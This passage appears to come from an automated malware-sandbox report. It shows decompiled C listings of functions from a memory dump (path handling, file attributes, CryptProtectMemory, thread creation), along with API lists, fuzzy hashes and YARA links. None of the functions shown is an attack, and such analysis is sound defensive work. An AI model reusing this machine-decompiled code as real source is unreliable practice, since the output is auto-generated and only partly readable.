                              • Part of subcall function 00A07DBB: GetCurrentProcess.KERNEL32(C0000417,00A07AE8,00000016,00A08599), ref: 00A07DDF
                              • Part of subcall function 00A07DBB: TerminateProcess.KERNEL32(00000000), ref: 00A07DE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                            • String ID: *?$.
                            • API String ID: 2667617558-3972193922
                            • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                            • Instruction ID: c11d5df32d1ca20c76fc4759009a33e78751419d4d28323c262c11b8d137ff33
                            • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
                            • Instruction Fuzzy Hash: 9551A675E0020EEFDF14DFA8D981AAEB7F5EF58314F244169E454E7382E6719E018B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E7570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E009E7570(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E009FD870(E00A11298, _t108);
				E009FD940();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E009EFAB1(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E009E7773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E009EFA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E009E6EF9(_t108 - 0x307c);
							_push(0);
							_t54 = E009EA1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E009EA12F(_t106, _t85 & 0xfffffffe);
							}
							E009E943C(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E009E9BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E009E399D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E009E94DA(_t108 - 0x2034);
								}
							}
							E009E943C(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E009E9768(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E009EA12F(_t106,  *(_t108 - 0x2074));
							E009E946E(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E009E943C(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E009E399D(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E009E946E(_t90);
					} else {
						E009E6BF5(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E009E6E03(0xa200e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E009EFAB1(_t108 - 0x1010, 0xa12490, 0x802);
					E009EFA89(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}















                            0x009e7570
                            0x009e7575
                            0x009e757f
                            0x009e7586
                            0x009e758f
                            0x009e75be
                            0x009e75be
                            0x009e75cc
                            0x009e75d1
                            0x009e75d1
                            0x009e75e1
                            0x009e75e6
                            0x009e75ee
                            0x009e760d
                            0x009e7611
                            0x009e764e
                            0x009e7659
                            0x009e7666
                            0x009e7669
                            0x009e766e
                            0x009e7674
                            0x009e7677
                            0x009e767a
                            0x009e767c
                            0x009e7681
                            0x009e7681
                            0x009e768c
                            0x009e7699
                            0x009e76a7
                            0x009e76ac
                            0x009e76ae
                            0x009e76b0
                            0x009e76b9
                            0x009e76ba
                            0x009e76bb
                            0x009e76c0
                            0x009e76c2
                            0x009e76ca
                            0x009e76ca
                            0x009e76c2
                            0x009e76d5
                            0x009e76da
                            0x009e76de
                            0x009e76e2
                            0x009e76ed
                            0x009e76f2
                            0x009e76f4
                            0x009e7711
                            0x009e7711
                            0x009e76f4
                            0x009e771e
                            0x009e7729
                            0x009e772e
                            0x009e7613
                            0x009e7619
                            0x009e761e
                            0x009e7628
                            0x009e7629
                            0x009e762c
                            0x009e762f
                            0x009e7634
                            0x009e7634
                            0x009e7734
                            0x009e75f0
                            0x009e75f7
                            0x009e7603
                            0x009e7603
                            0x009e773f
                            0x009e7749
                            0x009e7749
                            0x009e7591
                            0x009e7595
                            0x00000000
                            0x009e7597
                            0x009e7597
                            0x009e75a9
                            0x009e75b7
                            0x00000000
                            0x009e75b7

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E7575
                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E7711
                              • Part of subcall function 009EA12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009E9F65,?,?,?,009E9DFE,?,00000001,00000000,?,?), ref: 009EA143
                              • Part of subcall function 009EA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009E9F65,?,?,?,009E9DFE,?,00000001,00000000,?,?), ref: 009EA174
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: File$Attributes$H_prologTime
                            • String ID: :
                            • API String ID: 1861295151-336475711
                            • Opcode ID: a693e5d61bfea270e1b20887528fe94206f4bb238acf0d8a7de9f2d2e10ce95f
                            • Instruction ID: 0bc985ca00c31733b73c54a6964a6e2d9e4217acfac9dcc4c653d37179d5f0be
                            • Opcode Fuzzy Hash: a693e5d61bfea270e1b20887528fe94206f4bb238acf0d8a7de9f2d2e10ce95f
                            • Instruction Fuzzy Hash: B941A571805198AADB26EBA5CC55FEFB37CAF85340F0040E9B505A7092EB745F84CB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EB32C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                            Download Yara Rule
                            C-Code - Quality: 81%
                            			E009EB32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E009FD940();
				_t71 = _a4;
				if( *_t71 != 0) {
					E009EB4C6(_t71);
					_t66 = E00A02B33(_t71);
					_t30 = E009EB4F2(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E009EB5CD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E009EAEA5(__eflags,  &_v4100, 0x800);
							_t39 = E00A02B33( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E009EFAB1(_a8, L"\\\\?\\", _t69);
							E009EFA89(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E009EB5CD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E009EFA89(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E009EFAB1(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E009EFA89(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E009EB4C6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E009EFAB1(_a8, L"\\\\?\\", _t73);
						E009EFA89(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E009EFAB1(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















                            0x009eb334
                            0x009eb33a
                            0x009eb341
                            0x009eb34d
                            0x009eb35a
                            0x009eb35c
                            0x009eb361
                            0x009eb363
                            0x009eb3e9
                            0x009eb3ef
                            0x009eb3f1
                            0x009eb4b0
                            0x009eb4b0
                            0x009eb4b0
                            0x009eb4b2
                            0x00000000
                            0x009eb4b3
                            0x009eb3f7
                            0x009eb3f9
                            0x00000000
                            0x00000000
                            0x009eb408
                            0x009eb40a
                            0x009eb44f
                            0x009eb45b
                            0x009eb465
                            0x009eb469
                            0x009eb46b
                            0x00000000
                            0x00000000
                            0x009eb476
                            0x009eb486
                            0x009eb48b
                            0x009eb48f
                            0x009eb49b
                            0x009eb49d
                            0x009eb49f
                            0x009eb49f
                            0x009eb49f
                            0x009eb49d
                            0x009eb4a2
                            0x009eb4a2
                            0x009eb4a3
                            0x009eb4a3
                            0x009eb4a4
                            0x009eb4a4
                            0x009eb4a7
                            0x009eb4ac
                            0x00000000
                            0x009eb4ac
                            0x009eb40c
                            0x009eb40f
                            0x009eb412
                            0x009eb414
                            0x00000000
                            0x00000000
                            0x009eb423
                            0x009eb42a
                            0x009eb43c
                            0x00000000
                            0x009eb43c
                            0x009eb366
                            0x009eb36b
                            0x009eb36d
                            0x009eb395
                            0x009eb396
                            0x009eb399
                            0x00000000
                            0x00000000
                            0x009eb39f
                            0x009eb3a2
                            0x009eb3a5
                            0x00000000
                            0x00000000
                            0x009eb3ab
                            0x009eb3ae
                            0x009eb3b1
                            0x009eb3b3
                            0x00000000
                            0x00000000
                            0x009eb3c2
                            0x009eb3d0
                            0x009eb3d5
                            0x009eb3d6
                            0x00000000
                            0x009eb3d6
                            0x009eb36f
                            0x009eb372
                            0x009eb375
                            0x00000000
                            0x00000000
                            0x009eb386
                            0x009eb38b
                            0x00000000
                            0x009eb343
                            0x009eb343
                            0x009eb4b4
                            0x009eb4b8
                            0x009eb4b8

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: UNC$\\?\
                            • API String ID: 0-253988292
                            • Opcode ID: dbb87b44011b0e207608d49413952c4462817977d73b87273f689a12393d8d0b
                            • Instruction ID: 20e9aed5ba2c379c0d2592b4f0cc782528322ab5910e3482f2615cd899c7ffde
                            • Opcode Fuzzy Hash: dbb87b44011b0e207608d49413952c4462817977d73b87273f689a12393d8d0b
                            • Instruction Fuzzy Hash: DD41D731400299BACF23AF62CC91FEB776DAF45361B008466F958A71A2F774DD90CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F8A07, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E009F8A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E009FD82C(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E009F83B5(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E009F9184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E009F931D( *((intOrPtr*)(_t43 + 0xc)), 1);
					E009F92D3( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E009F9238( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E009F8581(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0xa1412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}














                            0x009f8a08
                            0x009f8a0d
                            0x009f8a11
                            0x009f8a14
                            0x009f8a19
                            0x009f8a20
                            0x009f8a2b
                            0x009f8a2b
                            0x009f8a22
                            0x009f8a24
                            0x009f8a24
                            0x009f8a2d
                            0x009f8a32
                            0x009f8abd
                            0x009f8a38
                            0x009f8a3a
                            0x009f8a45
                            0x009f8a4f
                            0x009f8a59
                            0x009f8a61
                            0x009f8a66
                            0x009f8a6a
                            0x009f8a8c
                            0x009f8a8e
                            0x009f8a91
                            0x009f8a95
                            0x009f8a9a
                            0x009f8a9d
                            0x009f8a9e
                            0x009f8a9f
                            0x009f8aa0
                            0x009f8aa3
                            0x009f8aa5
                            0x009f8aa6
                            0x009f8aa9
                            0x009f8ab0
                            0x009f8aab
                            0x009f8aab
                            0x009f8aab
                            0x009f8ab6
                            0x009f8ab6
                            0x009f8ab9
                            0x00000000
                            0x009f8aba
                            0x009f8a6e
                            0x009f8a6e
                            0x009f8a78
                            0x009f8a7f
                            0x009f8a84
                            0x00000000
                            0x00000000
                            0x009f8a86
                            0x00000000
                            0x009f8a86

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
                            • String ID: Shell.Explorer$about:blank
                            • API String ID: 0-874089819
                            • Opcode ID: 9c73ebd3259b08496da6da561e8c4dc071acb3f708828b564bca3319c33bc11c
                            • Instruction ID: b0f3f843624e7f6b168602c8e71c83b91971230296c8786c6bbc2b59a9fed0e6
                            • Opcode Fuzzy Hash: 9c73ebd3259b08496da6da561e8c4dc071acb3f708828b564bca3319c33bc11c
                            • Instruction Fuzzy Hash: AB215E7160060ABFC7449FA4C895E76B76CFF85314B04861AB6158B682DF70E861CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009EE862, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 20%
                            			E009EE862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t11;
				intOrPtr* _t12;
				signed char _t13;
				void* _t17;
				signed char _t18;
				void* _t20;
				signed int _t22;
				signed int _t30;
				void* _t31;
				void* _t32;
				intOrPtr _t33;
				signed int _t36;

				_t32 = __edi;
				_t17 = __ebx;
				_t11 =  *0xa27358; // 0x0
				if(_t11 == 0) {
					E009EE7E3(0xa27350);
					_t11 =  *0xa27358; // 0x0
				}
				_t36 = _a8;
				_t22 = _t36 & 0xfffffff0;
				_t30 = 0 | _a16 != 0x00000000;
				if(_a12 == 0) {
					_t12 =  *0xa2735c; // 0x0
					if(_t12 == 0) {
						goto L10;
					} else {
						_t13 =  *_t12(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptUnprotectMemory failed");
							goto L6;
						}
					}
				} else {
					if(_t11 == 0) {
						L10:
						_push(_t17);
						_t13 = GetCurrentProcessId();
						_t31 = 0;
						_t18 = _t13;
						if(_t36 != 0) {
							_push(_t32);
							_t33 = _a4;
							_t20 = _t18 + 0x4b;
							do {
								_t13 = _t31 + _t20;
								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
								_t31 = _t31 + 1;
							} while (_t31 < _t36);
						}
					} else {
						_t13 =  *_t11(_a4, _t22, _t30);
						if(_t13 == 0) {
							_push(L"CryptProtectMemory failed");
							L6:
							_push(0xa200e0);
							_t13 = E009E6CC9(E009FE214(E009E6CCE(_t22)), 0xa200e0, 0xa200e0, 2);
						}
					}
				}
				return _t13;
			}

















                            0x009ee862
                            0x009ee862
                            0x009ee865
                            0x009ee86c
                            0x009ee873
                            0x009ee878
                            0x009ee878
                            0x009ee87e
                            0x009ee885
                            0x009ee88b
                            0x009ee892
                            0x009ee8c7
                            0x009ee8ce
                            0x00000000
                            0x009ee8d0
                            0x009ee8d5
                            0x009ee8d9
                            0x009ee8db
                            0x00000000
                            0x009ee8db
                            0x009ee8d9
                            0x009ee894
                            0x009ee896
                            0x009ee8e2
                            0x009ee8e2
                            0x009ee8e3
                            0x009ee8e9
                            0x009ee8eb
                            0x009ee8ef
                            0x009ee8f1
                            0x009ee8f2
                            0x009ee8f5
                            0x009ee8f8
                            0x009ee8fb
                            0x009ee8fe
                            0x009ee900
                            0x009ee901
                            0x009ee905
                            0x009ee898
                            0x009ee89d
                            0x009ee8a1
                            0x009ee8a3
                            0x009ee8a8
                            0x009ee8ad
                            0x009ee8c0
                            0x009ee8c0
                            0x009ee8a1
                            0x009ee896
                            0x009ee909

                            APIs
                              • Part of subcall function 009EE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009EE802
                              • Part of subcall function 009EE7E3: GetProcAddress.KERNEL32(00A27350,CryptUnprotectMemory), ref: 009EE812
                            • GetCurrentProcessId.KERNEL32(?,?,?,009EE85C), ref: 009EE8E3
                            Strings
                            • CryptUnprotectMemory failed, xrefs: 009EE8DB
                            • CryptProtectMemory failed, xrefs: 009EE8A3
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AddressProc$CurrentProcess
                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                            • API String ID: 2190909847-396321323
                            • Opcode ID: dbbe22669ac2330ee49a92f4afe86933ef58c536e95fb0ad56e54e1c0f8125ed
                            • Instruction ID: 1ee58d40a59870d4a3e1d206d521c7f5ffecdfa95282f27712bf5297cf1a6e94
                            • Opcode Fuzzy Hash: dbbe22669ac2330ee49a92f4afe86933ef58c536e95fb0ad56e54e1c0f8125ed
                            • Instruction Fuzzy Hash: CE113A307042956BEB17DB3ADC45BBE37DDEF88B54B044039F8409A292EB60DD519391
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F04F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 70%
                            			E009F04F5() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0xa200e0 > 0) {
					_t18 = 0xa200e4;
					do {
						_t22 = CreateThread(0, 0x10000, E009F062F, 0xa200e0, 0,  &_v4);
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0xa200e0);
							E009E6CC9(E009FE214(E009E6CCE(0xa200e0)), 0xa200e0, 0xa200e0, 2);
						}
						 *_t18 = _t22;
						 *0x00A201E4 =  *((intOrPtr*)(0xa201e4)) + 1;
						_t8 =  *0xa27368; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0xa200e0);
					return _t8;
				}
				return _t5;
			}












                            0x009f04fa
                            0x009f04fe
                            0x009f0502
                            0x009f0505
                            0x009f051f
                            0x009f0523
                            0x009f0525
                            0x009f052a
                            0x009f0547
                            0x009f0547
                            0x009f054c
                            0x009f054e
                            0x009f0554
                            0x009f055b
                            0x009f0560
                            0x009f0560
                            0x009f0566
                            0x009f0567
                            0x009f056a
                            0x00000000
                            0x009f056f
                            0x009f0573

                            APIs
                            • CreateThread.KERNEL32 ref: 009F0519
                            • SetThreadPriority.KERNEL32(?,00000000), ref: 009F0560
                              • Part of subcall function 009E6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E6CEC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Thread$CreatePriority__vswprintf_c_l
                            • String ID: CreateThread failed
                            • API String ID: 2655393344-3849766595
                            • Opcode ID: 6c859cbea124388df97cbb33ae260105eca693f45c085f8ac9cd063f5e0efa87
                            • Instruction ID: 60ac372f348a4c6cf022f63440ef2869ef5c1626fcd061c94ec7a458504ab60a
                            • Opcode Fuzzy Hash: 6c859cbea124388df97cbb33ae260105eca693f45c085f8ac9cd063f5e0efa87
                            • Instruction Fuzzy Hash: FC01D6B13483096BE624AF55AC41FB677ACEBC4751F20043DFBC5A6182CAE1AC95CB20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E12D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E009E12D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E009ED6E4(0xa20078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E009ED70B(0xa20078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0xa1dfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0xa122e4);
								}
							}
						}
					}
				}
				return 0;
			}





                            0x009e12de
                            0x009e1341
                            0x009e12e0
                            0x009e12e0
                            0x009e12e7
                            0x009e12fd
                            0x009e1306
                            0x009e130b
                            0x009e1313
                            0x009e131b
                            0x009e1323
                            0x009e1331
                            0x009e1331
                            0x009e1323
                            0x009e1313
                            0x009e1306
                            0x009e12e7
                            0x009e1349

                            APIs
                              • Part of subcall function 009ED70B: _swprintf.LIBCMT ref: 009ED731
                              • Part of subcall function 009ED70B: _strlen.LIBCMT ref: 009ED752
                              • Part of subcall function 009ED70B: SetDlgItemTextW.USER32(?,00A1D154,?), ref: 009ED7B2
                              • Part of subcall function 009ED70B: GetWindowRect.USER32(?,?), ref: 009ED7EC
                              • Part of subcall function 009ED70B: GetClientRect.USER32(?,?), ref: 009ED7F8
                            • GetDlgItem.USER32(00000000,00003021), ref: 009E131B
                            • SetWindowTextW.USER32(00000000,00A122E4), ref: 009E1331
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                            • String ID: 0
                            • API String ID: 2622349952-4108050209
                            • Opcode ID: e767ddf78d1f382d010bbee612a8ad6db9fb9e095efd32ed7a517571ec979707
                            • Instruction ID: d9ef7c878c312047794d471f0de61aea060857122c8029c8d1beccf32e71a6b8
                            • Opcode Fuzzy Hash: e767ddf78d1f382d010bbee612a8ad6db9fb9e095efd32ed7a517571ec979707
                            • Instruction Fuzzy Hash: 01F0C2705402C8ABDF270F669C09BF93F6DAF04344F009414FC59918A1C778CE91EB18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F04BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E009F04BA(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
